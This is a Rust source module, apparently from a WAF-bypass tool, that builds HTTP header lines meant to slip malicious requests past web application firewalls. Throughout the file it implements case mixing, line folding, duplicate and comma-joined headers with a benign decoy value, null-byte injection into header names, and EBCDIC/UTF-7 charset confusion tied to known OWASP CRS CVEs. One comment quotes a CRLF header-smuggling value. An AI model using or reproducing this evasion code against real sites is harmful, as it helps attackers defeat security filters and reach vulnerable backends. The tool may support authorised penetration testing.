wafrift_encoding/header.rs
1//! HTTP header obfuscation for WAF bypass.
2//!
3//! WAFs inspect HTTP headers to detect malicious requests. This module
4//! applies transformations that are valid per HTTP RFCs but confuse
5//! WAF header parsers, causing them to misparse or skip inspection.
6//!
7//! # Techniques
8//!
9//! - **Case mixing** — `cOnTeNt-TyPe` instead of `Content-Type`
10//! - **Whitespace tricks** — tabs, spaces around colons and values
11//! - **Header folding** — obsolete but still parsed by many servers (RFC 7230 §3.2.4)
12//! - **Duplicate headers** — first vs. last wins disagreement
13//! - **Underscore substitution** — `Content_Type` accepted by some servers
14//! - **Null byte injection** — `Content-Type\x00` truncates header name
15//! - **`SPaced` header name** — `Content-Type ` trailing space before colon
16//! - **Header value wrapping** — Value spread across multiple continuation lines
17//! - **Comma-joined header values** — Multiple values in one header via comma
18
19use std::fmt;
20use wafrift_types::hash::{FNV_OFFSET_64, FNV_PRIME_64};
21
22/// A header transformation technique.
23#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)]
24#[non_exhaustive]
25pub enum HeaderTechnique {
26 /// Random case mixing of header name.
27 CaseMixing,
28 /// Tab character instead of space after colon.
29 TabSeparator,
30 /// Extra whitespace around header value.
31 WhitespacePadding,
32 /// Obsolete header folding with continuation line (CRLF + whitespace).
33 LineFolding,
34 /// LF-only continuation line.
35 LfOnlyLineFolding,
36 /// Duplicate header with benign value first.
37 DuplicateHeader,
38 /// Underscore instead of hyphen in header name.
39 UnderscoreSubstitution,
40 /// Null byte injected into header name.
41 NullByteInjection,
42 /// Trailing space before colon in header name.
43 TrailingSpace,
44 /// Header value wrapped across multiple continuation lines.
45 MultiLineFolding,
46 /// LF-only multi-line folding.
47 LfOnlyMultiLineFolding,
48 /// Multiple values comma-joined in a single header.
49 CommaJoin,
50}
51
52impl fmt::Display for HeaderTechnique {
53 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
54 match self {
55 Self::CaseMixing => f.write_str("case-mixing"),
56 Self::TabSeparator => f.write_str("tab-separator"),
57 Self::WhitespacePadding => f.write_str("whitespace-padding"),
58 Self::LineFolding => f.write_str("line-folding"),
59 Self::LfOnlyLineFolding => f.write_str("lf-only-line-folding"),
60 Self::DuplicateHeader => f.write_str("duplicate-header"),
61 Self::UnderscoreSubstitution => f.write_str("underscore-substitution"),
62 Self::NullByteInjection => f.write_str("null-byte-injection"),
63 Self::TrailingSpace => f.write_str("trailing-space"),
64 Self::MultiLineFolding => f.write_str("multi-line-folding"),
65 Self::LfOnlyMultiLineFolding => f.write_str("lf-only-multi-line-folding"),
66 Self::CommaJoin => f.write_str("comma-join"),
67 }
68 }
69}
70
71/// Apply case mixing to a header name.
72///
73/// Produces `cOnTeNt-TyPe` style output. HTTP header names are defined
74/// as case-insensitive (RFC 7230 §3.2), so servers accept any casing,
75/// but some WAFs only match canonical `Content-Type`.
76#[must_use]
77pub fn case_mix(header_name: &str) -> String {
78 crate::encoding::keyword::alternating_case(header_name, false)
79}
80
81/// Strip CR (`\r`), LF (`\n`), and NUL (`\0`) from a header value so
82/// the mutator output cannot smuggle a fake header line. Pre-fix every
83/// public mutator embedded `value` verbatim — a caller passing a value
84/// containing `\r\nEvil-Header: pwn` produced response splitting /
85/// request smuggling on the wire. The transport layer assumed these
86/// helpers had already sanitised; the helpers assumed the transport
87/// layer would. Both wrong. Sanitising here closes the gap without an
88/// API break.
89fn sanitize_header_value(value: &str) -> String {
90 value
91 .chars()
92 .filter(|c| *c != '\r' && *c != '\n' && *c != '\0')
93 .collect()
94}
95
96/// Apply tab separator: `Header:\tvalue` instead of `Header: value`.
97#[must_use]
98pub fn tab_separator(header_name: &str, value: &str) -> String {
99 let value = sanitize_header_value(value);
100 format!("{header_name}:\t{value}")
101}
102
103/// Apply whitespace padding around the value.
104///
105/// F136: pad count is derived deterministically from `header_name + value`
106/// via FNV-1a, NOT `rand::random`. A non-deterministic encoder cannot be
107/// regression-pinned and makes a successful bypass impossible to reproduce
108/// (every other tamper in this crate is deterministic for exactly this
109/// reason — see `parameter_pollute`'s F114 fix). The output pad range
110/// (2–5 spaces) is unchanged.
111#[must_use]
112pub fn whitespace_pad(header_name: &str, value: &str) -> String {
113 let value = sanitize_header_value(value);
114 let mut h: u64 = FNV_OFFSET_64;
115 for b in header_name.bytes().chain(value.bytes()) {
116 h ^= u64::from(b);
117 h = h.wrapping_mul(FNV_PRIME_64);
118 }
119 let pad_count = (h as usize % 4) + 2; // 2–5 spaces, deterministic
120 let pad = " ".repeat(pad_count);
121 format!("{header_name}:{pad}{value}{pad}")
122}
123
124/// Apply obsolete line folding (RFC 7230 §3.2.4).
125///
126/// The header value is split across two lines with a continuation marker
127/// (CRLF followed by a space or tab). This is obsolete but many servers
128/// still accept it, while WAFs often do not reassemble folded headers.
129#[must_use]
130pub fn line_fold(header_name: &str, value: &str) -> String {
131 line_fold_with_ending(header_name, value, "\r\n")
132}
133
134/// Apply LF-only line folding.
135#[must_use]
136pub fn lf_only_line_fold(header_name: &str, value: &str) -> String {
137 line_fold_with_ending(header_name, value, "\n")
138}
139
140fn line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
141 let value = sanitize_header_value(value);
142 if value.len() < 4 {
143 return format!("{header_name}: {value}");
144 }
145 let mid = crate::floor_char_boundary(&value, value.len() / 2);
146 format!(
147 "{}: {}{ending}\t{}",
148 header_name,
149 &value[..mid],
150 &value[mid..]
151 )
152}
153
154/// Apply multi-line folding — value spread across 3+ continuation lines.
155///
156/// More aggressive than single fold — splits value into thirds.
157/// Many WAFs only handle one continuation line.
158#[must_use]
159pub fn multi_line_fold(header_name: &str, value: &str) -> String {
160 multi_line_fold_with_ending(header_name, value, "\r\n")
161}
162
163/// Apply LF-only multi-line folding.
164#[must_use]
165pub fn lf_only_multi_line_fold(header_name: &str, value: &str) -> String {
166 multi_line_fold_with_ending(header_name, value, "\n")
167}
168
169fn multi_line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
170 let value = sanitize_header_value(value);
171 if value.len() < 6 {
172 return format!("{header_name}: {value}");
173 }
174 let t1 = crate::floor_char_boundary(&value, value.len() / 3);
175 let t2 = crate::floor_char_boundary(&value, value.len() * 2 / 3);
176 format!(
177 "{}: {}{ending} {}{ending}\t{}",
178 header_name,
179 &value[..t1],
180 &value[t1..t2],
181 &value[t2..]
182 )
183}
184
185/// Generate a duplicate header pair: returns `(benign_line, real_line)`.
186///
187/// Some WAFs only inspect the first occurrence of a header, while many
188/// servers use the last. By placing a benign value first and the real
189/// value second, the WAF sees the benign header, the server sees the
190/// real one.
191#[must_use]
192pub fn duplicate_header(
193 header_name: &str,
194 real_value: &str,
195 benign_value: &str,
196) -> (String, String) {
197 let real = sanitize_header_value(real_value);
198 let benign = sanitize_header_value(benign_value);
199 (
200 format!("{header_name}: {benign}"),
201 format!("{header_name}: {real}"),
202 )
203}
204
205/// Replace hyphens with underscores in the header name.
206///
207/// Some web servers (notably PHP with `$_SERVER`, and CGI) normalise
208/// `Content_Type` → `Content-Type`. WAFs typically do not.
209#[must_use]
210pub fn underscore_substitute(header_name: &str) -> String {
211 header_name.replace('-', "_")
212}
213
214/// Inject a null byte into the header name at the midpoint.
215///
216/// Some C-based WAF implementations (modSecurity, native nginx modules)
217/// use null-terminated string operations internally. A null byte in the
218/// header name causes the WAF to see a truncated name (e.g., `Content`
219/// instead of `Content-Type\x00`), while the upstream server may parse
220/// the full name.
221#[must_use]
222pub fn null_byte_inject(header_name: &str) -> String {
223 if header_name.len() < 2 {
224 return header_name.to_string();
225 }
226 let mid = crate::floor_char_boundary(header_name, header_name.len() / 2);
227 format!("{}\x00{}", &header_name[..mid], &header_name[mid..])
228}
229
230/// Add a trailing space before the colon separator.
231///
232/// `Content-Type : value` — some parsers strip the space, making this
233/// equivalent. WAFs that expect `Name:` or `Name: ` without extra space
234/// in the header name field may fail to match.
235#[must_use]
236pub fn trailing_space(header_name: &str, value: &str) -> String {
237 let value = sanitize_header_value(value);
238 format!("{header_name} : {value}")
239}
240
241/// Comma-join multiple values into a single header.
242///
243/// Per RFC 7230 §3.2.6, a recipient may combine multiple header fields
244/// with the same name into one `field-value` separated by commas.
245/// `Header: benign, malicious` is semantically equivalent to two
246/// separate `Header: benign` and `Header: malicious` lines. WAFs that
247/// split on the first comma may only inspect `benign`.
248#[must_use]
249pub fn comma_join(header_name: &str, real_value: &str, benign_value: &str) -> String {
250 let real = sanitize_header_value(real_value);
251 let benign = sanitize_header_value(benign_value);
252 format!("{header_name}: {benign}, {real}")
253}
254
255/// Build a `Content-Type` header with an exotic charset claim.
256///
257/// CVE-2022-39956 (Content-Type/Content-Transfer-Encoding abuse) +
258/// CVE-2022-39957 (Accept-Charset bypass) — OWASP CRS pre-3.3.3 did
259/// not validate the charset field before running UTF-8 regex rules.
260/// Attacker claims `charset=ibm037` (EBCDIC) or `charset=utf-32`;
261/// WAF runs regex against bytes that aren't even ASCII-`SELECT`, so
262/// the rule misses. Backend re-decodes via its own charset
263/// negotiation and sees the original payload.
264///
265/// Still relevant for unpatched CRS deployments AND for WAFs
266/// (Cloudflare, AWS) that don't fully validate charset before
267/// scanning. Fixed in CRS 3.3.3 / 3.2.2 (Sept 2022).
268#[must_use]
269pub fn charset_confusion(media_type: &str, charset: &str) -> String {
270 // No sanitize_header_value here — the whole point is exotic
271 // charset claims; the WAF SHOULD accept the line per RFC.
272 format!("Content-Type: {media_type}; charset={charset}")
273}
274
275/// Canonical list of exotic charset claims for `charset_confusion`.
276/// Each is a real IANA charset that some backend will accept and a
277/// hand-rolled WAF regex won't decode.
278pub const EXOTIC_CHARSETS: &[&str] = &[
279 "ibm037", // EBCDIC — byte values disjoint from ASCII
280 "ibm500", // EBCDIC variant
281 "utf-32", // 4-byte-per-char — ASCII regex misses
282 "utf-32be",
283 "utf-16",
284 "utf-16be",
285 "utf-7", // SELECT = +U0wAAA-
286 "shift_jis", // Japanese — partial ASCII overlap
287 "gb18030", // Chinese
288 "iso-2022-jp", // Stateful — toggle-byte before SELECT
289];
290
291/// Apply all header obfuscation techniques to a header name/value pair.
292///
293/// Returns a vector of `(technique, obfuscated_header_line)` pairs.
294/// For `DuplicateHeader`, the two lines are joined with CRLF.
295#[must_use]
296pub fn all_obfuscations(header_name: &str, value: &str) -> Vec<(HeaderTechnique, String)> {
297 let benign = "safe_value";
298 // Three entries below (CaseMixing, UnderscoreSubstitution,
299 // NullByteInjection) transform only the header NAME and interpolate
300 // the value inline, so they must sanitise it here the same way the
301 // helper-based entries do internally — otherwise a value containing
302 // `\r\n` smuggles a header line on the wire. This is the exact gap
303 // `sanitize_header_value` was added to close; these inline format!s
304 // were missed by that fix. (The helper-based entries below sanitise
305 // internally, so passing the raw `value` to them stays correct.)
306 let safe_value = sanitize_header_value(value);
307 vec![
308 (
309 HeaderTechnique::CaseMixing,
310 format!("{}: {}", case_mix(header_name), safe_value),
311 ),
312 (
313 HeaderTechnique::TabSeparator,
314 tab_separator(header_name, value),
315 ),
316 (
317 HeaderTechnique::WhitespacePadding,
318 whitespace_pad(header_name, value),
319 ),
320 (HeaderTechnique::LineFolding, line_fold(header_name, value)),
321 (
322 HeaderTechnique::LfOnlyLineFolding,
323 lf_only_line_fold(header_name, value),
324 ),
325 (HeaderTechnique::DuplicateHeader, {
326 let (a, b) = duplicate_header(header_name, value, benign);
327 format!("{a}\r\n{b}")
328 }),
329 (
330 HeaderTechnique::UnderscoreSubstitution,
331 format!("{}: {}", underscore_substitute(header_name), safe_value),
332 ),
333 (
334 HeaderTechnique::NullByteInjection,
335 format!("{}: {}", null_byte_inject(header_name), safe_value),
336 ),
337 (
338 HeaderTechnique::TrailingSpace,
339 trailing_space(header_name, value),
340 ),
341 (
342 HeaderTechnique::MultiLineFolding,
343 multi_line_fold(header_name, value),
344 ),
345 (
346 HeaderTechnique::LfOnlyMultiLineFolding,
347 lf_only_multi_line_fold(header_name, value),
348 ),
349 (
350 HeaderTechnique::CommaJoin,
351 comma_join(header_name, value, benign),
352 ),
353 ]
354}
355
356#[cfg(test)]
357#[path = "header_tests.rs"]
358mod tests;